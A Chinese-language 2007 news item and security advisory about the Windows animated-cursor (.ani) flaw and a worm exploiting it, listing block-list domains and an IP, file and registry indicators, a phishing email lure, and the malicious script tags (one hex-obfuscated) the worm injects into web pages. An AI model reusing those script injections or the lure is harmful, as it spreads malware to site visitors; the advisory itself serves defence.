游標漏洞的複合型蠕蟲現身 Vista作業系統曝出首個重大漏洞_IT 業界

游標漏洞的複合型蠕蟲現身 Vista作業系統曝出首個重大漏洞

3月30日，微軟Vista作業系統曝出首個重大漏洞。昨天，瑞星反病毒專家發現該漏洞已經開始被駭客利用，使用Windows Vista和XP的使用者，在訪問帶毒網站時會被威金病毒、盜號木馬(木馬查殺軟體下載)等多種病毒感染。據監測，國內已有近十個網站被駭客攻陷。

此前，微軟公司曾發出警告稱，攻擊者正在積極利用Windows動畫游標(.ani)檔案中一個未修複漏洞。這個漏洞將影響Windows XP以上作業系統和IE6以上的瀏覽器，微軟最新的Vista和IE7都不能倖免。目前微軟還沒有發布此漏洞的補丁。

據瑞星安全專家介紹，ANI檔案是Windows滑鼠動態游標檔案，由於Vista等系統在處理ANI檔案的方式上存在漏洞，駭客可以構造特殊格式的ANI檔案，當使用者瀏覽含有該檔案的網頁，或點擊該檔案就會自動下載運行駭客指定的病毒、木馬及後門程式等。目前利用該漏洞的病毒中，威金（Worm.Viking）變種及竊取網路遊戲的木馬病毒佔多數。

這是Vista系統第一次曝出重大漏洞，利用該漏洞傳播病毒的網站數量正逐步增多，攻擊代碼很可能已經公開。

安全專家提醒普通網民不要輕易登陸陌生網站，尤其是通過電子郵件、聊天軟體等發送來的陌生網址。網站的管理員，應該加強對自己伺服器日誌的管理，尤其要注意不明來源的ANI及JPG等格式圖片檔案，一旦出現異常儘快處理。

------------------C.I.S.R.T.資訊------------------

一個非常不好的訊息要告訴大家，利用微軟動畫游標漏洞的新蠕蟲已經現身。我們收到了相關的樣本，通過分析，我們已經確認這是一個複合型蠕蟲，含有類似熊貓燒香的感染功能、下載其他病毒的功能、發送含有最新.ani漏洞網址郵件的功能、感染html等檔案並向這些檔案裡添加含有最新漏洞網址的功能。由於危險程度非常高，CISRT Lab決定再次發布中度風險警報，提醒廣大網友提高警惕！

同時我們建議廣大網友、企業網管對以下兩個網域名稱和IP進行屏蔽：

2007ip.com
microfsot.com
61.153.247.76


蠕蟲的大小在13K左右，會釋放檔案到以下目錄：

%SYSTEM%\sysload3.exe


添加註冊表索引值：

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"


會發送郵件：

From: i_lov e_cq@sohu. com
Subject:你和誰視頻的時候被拍下的？給你笑死了！
Body:
看你那小樣！我看你是出名了！
你看這個地址！你的臉拍的那麼清楚！你變明星了！
http://macr.micr of  sot.com/<remove d>/134952.htm


感染.HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE檔案，並向.HTML .ASPX .HTM .PHP .JSP .ASP檔案裡植入以下代碼：

<script src=http://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%6   1%63 %72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>


注意郵件和網頁中提到的網址中都含有.ani 0-day漏洞的惡意檔案。

Kaspersky檢測為Trojan-Downloader.Win32.Agent.bky，毒霸命名為Worm.MyInfect

目前我們收到樣本的MD5值為

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179


2007.3.31 22:45第一次更新：

作者在蠕蟲體內表達了對Kaspersky的不滿